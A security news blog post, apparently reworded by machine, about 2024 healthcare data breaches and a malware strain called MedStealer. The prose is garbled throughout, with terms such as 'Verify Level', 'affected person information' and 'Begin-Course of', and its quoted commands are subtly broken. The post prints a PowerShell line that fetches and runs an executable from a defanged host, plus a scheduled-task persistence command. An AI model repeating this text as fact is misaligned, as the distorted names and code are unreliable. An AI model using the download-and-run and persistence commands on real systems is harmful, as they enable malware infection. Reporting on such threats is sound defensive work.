Skip to content
  • Blog Home
  • Cyber Map
  • About Us – Contact
  • Disclaimer
  • Terms and Rules
  • Privacy Policy
Cyber Web Spider Blog – News

Cyber Web Spider Blog – News

Globe Threat Map provides a real-time, interactive 3D visualization of global cyber threats. Monitor DDoS attacks, malware, and hacking attempts with geo-located arcs on a rotating globe. Stay informed with live logs and archive stats.

  • Home
  • Cyber Map
  • Cyber Security News
  • Security Week News
  • The Hacker News
  • How To?
  • Toggle search form

Healthcare Cyber Attacks – 276 Million Patient Records were Compromised In 2024

Posted on May 15, 2025May 15, 2025 By CWS

In 2024, the healthcare sector confronted an unprecedented wave of cyber assaults, with 276 million affected person information uncovered globally.

Among the many most insidious threats was MedStealer, a malware pressure that focused digital well being information (EHRs), insurance coverage databases, and affected person portals.

First noticed in early 2024, MedStealer exploited vulnerabilities in legacy healthcare IT methods and third-party vendor networks.

Assault vectors ranged from phishing campaigns impersonating medical platforms like Zocdoc to SQL injection assaults on unpatched servers.

The malware’s main goal was to exfiltrate personally identifiable data (PII), insurance coverage particulars, and medical histories, which had been later offered on darkish net markets for premiums exceeding $1,000 per report.

Verify Level researchers recognized MedStealer’s distribution community, which relied closely on spear-phishing emails disguised as appointment confirmations or prescription notifications.

These emails contained malicious PDF attachments embedded with JavaScript droppers.

Zocdoc Phishing E mail Template (Supply – Verify Level)

As soon as opened, the script initiated a PowerShell command to obtain the malware payload from a command-and-control (C2) server.

The marketing campaign’s success stemmed from its use of geofencing-targeting customers primarily based within the U.S.-and leveraging compromised healthcare worker credentials to bypass e-mail filters.

The fallout was catastrophic: stolen knowledge fueled insurance coverage fraud, illicit prescription drug gross sales, and even life-threatening medical errors when EHRs had been altered.

Hospitals reported delays in remedies because of system lockdowns, whereas sufferers confronted id theft lawsuits and extortion makes an attempt.

An infection Mechanism: Mixing Social Engineering with Obfuscated Code

MedStealer’s an infection chain mixed psychological manipulation with superior technical evasion. A typical assault started with a phishing e-mail titled “Your Appointment is Prepared!”, which included a faux medical ID and urgency to behave.

The connected PDF used a Base64-encoded URL to fetch the payload:-

$payloadUrl = “hxxps://healthportal[.]care/replace.php?ID=ZXhhbXBsZS1iYWQN”;
Invoke-WebRequest -Uri $payloadUrl -OutFile $env:Tempmed_update.exe; Begin-Course of $env:Tempmed_update.exe

The malware employed course of hollowing to inject itself into reliable Home windows utilities like svchost.exe, evading endpoint detection.

Verify Level analysts famous that MedStealer’s authors used DNS tunneling to exfiltrate knowledge, disguising stolen information as benign HTTPS site visitors.

For persistence, the malware created a scheduled activity named “HealthMonitor”:-

schtasks /create /tn “HealthMonitor” /tr “C:WindowsSystem32med_update.exe” /sc hourly /mo 12

Notably, MedStealer exploited vulnerabilities in DICOM protocols (used for medical imaging), permitting lateral motion inside hospital networks.

Attackers leveraged misconfigureded PACS (Image Archiving and Communication Techniques) to deploy ransomware alongside knowledge theft instruments.

The surge in healthcare breaches underscores the necessity for zero-trust architectures and AI-driven anomaly detection.

Verify Level’s Concord E mail & Collaboration suite blocked over 7,000 MedStealer-linked phishing makes an attempt in 2024, highlighting the important position of adaptive e-mail safety.

As cyber criminals refine their ways, healthcare organizations should prioritize patch administration, worker coaching, and multi-layered menace prevention to safeguard delicate affected person knowledge.

How SOC Groups Save Time and Effort with ANY.RUN – Reside webinar for SOC groups and managers

Cyber Security News Tags:Attacks, Compromised, Cyber, Healthcare, Million, Patient, Records

Post navigation

Previous Post: BitLocker Encryption Bypassed in Minutes Using Bitpixie Vulnerability
Next Post: Chrome 136 Update Patches Vulnerability With ‘Exploit in the Wild’

Related Posts

Ubiquiti UniFi Protect Camera Vulnerability Allows Remote Code Execution Cyber Security News
Hackers Exploit Software Flaws within Hours Forcing Urgent Push for Faster Patches Cyber Security News
SSH Auth Keys Reuse Exposes Sophisticated Targeted Phishing Attack Cyber Security News
Chinese Agent Impersonates as Stanford Student For Intelligence Gathering Cyber Security News
How to Stay Ahead of Vulnerabilities Cyber Security News
DPRK’s Largest Cryptocurrency Heist via a Compromised macOS Developer and AWS Pivots Cyber Security News

Categories

  • Cyber Security News
  • How To?
  • Security Week News
  • The Hacker News

Recent Posts

  • How to Remove Malware From Your PC
  • How to Recover From a Data Breach
  • BreachRx Lands $15 Million as Investors Bet on Breach-Workflow Software
  • Printer Company Procolored Served Infected Software for Months
  • RVTools Official Site Hacked to Deliver Bumblebee Malware via Trojanized Installer

Pages

  • About Us – Contact
  • Disclaimer
  • Privacy Policy
  • Terms and Rules

Archives

  • May 2025

Recent Posts

  • How to Remove Malware From Your PC
  • How to Recover From a Data Breach
  • BreachRx Lands $15 Million as Investors Bet on Breach-Workflow Software
  • Printer Company Procolored Served Infected Software for Months
  • RVTools Official Site Hacked to Deliver Bumblebee Malware via Trojanized Installer

Pages

  • About Us – Contact
  • Disclaimer
  • Privacy Policy
  • Terms and Rules

Categories

  • Cyber Security News
  • How To?
  • Security Week News
  • The Hacker News